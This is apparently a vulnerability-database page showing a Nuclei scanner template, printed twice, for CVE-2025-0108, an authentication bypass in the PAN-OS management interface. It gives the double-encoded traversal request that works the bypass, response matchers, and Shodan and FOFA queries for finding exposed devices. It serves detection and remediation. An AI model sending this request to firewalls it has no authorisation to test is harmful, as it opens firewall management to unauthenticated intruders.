PAN-OS Management Interface - Path Confusion to Authentication Bypass

CVE-2025-0108

Verified

Description

A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.

Severity

Critical

CVSS Score

Exploit Probability

94%

Affected Product

pan-os

Published Date

February 13, 2025

Template Author

halencarjunior, ritikchaddha

CVE-2025-0108.yaml

id: CVE-2025-0108

info:
  name: PAN-OS Management Interface - Path Confusion to Authentication Bypass
  author: halencarjunior,ritikchaddha
  severity: critical
  description: |
    A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
  impact: |
    Unauthenticated attackers can exploit path confusion between Nginx and Apache to bypass authentication completely, gaining unauthorized access to the PAN-OS management interface and potentially compromising the entire firewall infrastructure.
  remediation: |
    Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
  classification:
    epss-score: 0.94007
    epss-percentile: 0.99883
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-0108
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2025,panos,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220297f6f62a35934c99bd51a99aec2c63c1348fefe9cf48b20b0878d8f19f6cd340221009baedf49e5c95fc63fa321f9877f85b16ca3907b1571b6216df23cb6ecd2c3ae:922c64590222798bb761d5b6d8e72950

10.0Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE ID:

cve-2025-0108

CWE ID:

cwe-287

References

https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/

Remediation Steps

Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.

Description

id: CVE-2025-0108

info:
  name: PAN-OS Management Interface - Path Confusion to Authentication Bypass
  author: halencarjunior,ritikchaddha
  severity: critical
  description: |
    A vulnerability in PAN-OS management interface allows authentication bypass through path confusion between Nginx and Apache handlers.The issue occurs due to differences in path processing between Nginx and Apache, where double URL encoding combined with directory traversal can bypass authentication checks enforced by X-pan-AuthCheck header.
  impact: |
    Unauthenticated attackers can exploit path confusion between Nginx and Apache to bypass authentication completely, gaining unauthorized access to the PAN-OS management interface and potentially compromising the entire firewall infrastructure.
  remediation: |
    Upgrade to the patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://slcyber.io/blog/nginx-apache-path-confusion-to-auth-bypass-in-pan-os/
  classification:
    epss-score: 0.94007
    epss-percentile: 0.99883
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-0108
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2025,panos,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220297f6f62a35934c99bd51a99aec2c63c1348fefe9cf48b20b0878d8f19f6cd340221009baedf49e5c95fc63fa321f9877f85b16ca3907b1571b6216df23cb6ecd2c3ae:922c64590222798bb761d5b6d8e72950

PAN-OS Management Interface - Path Confusion to Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

PAN-OS Management Interface - Path Confusion to Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps